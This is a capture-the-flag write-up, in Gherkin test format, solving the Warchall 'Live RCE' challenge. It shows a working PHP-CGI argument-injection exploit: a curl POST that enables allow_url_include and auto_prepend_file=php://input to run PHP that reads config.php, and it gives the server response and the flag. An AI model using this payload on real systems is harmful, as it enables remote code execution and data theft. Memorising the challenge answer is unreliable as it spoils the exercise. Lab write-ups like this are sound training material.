# language: en

Feature: Solve Warchal: Live RCE Challenge
  From the WeChall site
  Of the category PHP, Exploit and Warchall
  As the registered user disassembly

  Background:
    Given a PHP script that returns the $_SERVER vars
    Given I'm running macOS High Sierra 10.13.4 w/ curl 7.54.0

  Scenario: Look up for vulnerabilities in the script
    Given I have access to the code of the challenge
    """
    https://github.com/gizmore/gwf3/tree/master/www/challenge/warchall/live_rce
    """
    When I open the file /www/index.php doesn't shows me that much
    Then I open the file /install/live_rce.conf and see that uses CGI

  Scenario: Search information about the vulnerability (RCE)
    Given I know that the server use Apache, CGI and PHP
    When I search in Google with the keywords 'PHP-CGI Remote Code Execution'
    Then I found is a common vulnerability in the PHP configuration
    And it's exploitable through the url using some switches

  Scenario: Trying different approaches
    Given that also the switch -s allows me to see the source code (index.php)
    """
    http://rce.warchall.net/?-s
    """
    Then I realize that the second line imports a file thats not beign used
    """
    2  require '../config.php';
    """
    And that's must be the solution of the challenge
    Given I found a PoC exploit script in "https://p16.praetorian.com/blog/"
    Then I recover the most important part:
    """
    curl -i -k  -X 'POST' --data-binary "<?php PHP CODE; die; ?>" \
    URL/?%2dd+allow_url_include%3don+%2dd+auto_prepend_file%3dphp%3a%2f%2finput
    """

  Scenario: Make a Remote Code Execution attack
    Given I can use the PHP function 'file_get_contents' to read the file
    When I make the request with the above command next to 'echo' and the URL
    """
    PHP CODE => echo file_get_contents('../config.php')
    URL => http://rce.warchall.net
    """
    Then it shows me the content of the file 'config.php'
    """
    HTTP/1.1 200 OK
    Date: Tue, 10 Jul 2018 18:01:21 GMT
    Server: Apache
    X-Powered-By: PHP/5.3.10
    Transfer-Encoding: chunked
    Content-Type: text/html

    <?php
    define('ICANHAZRCE', 'StrongGard_6_3');
    return ICANHAZRCE;
    ?>
    """
    And StrongGard_6_3 its the solution
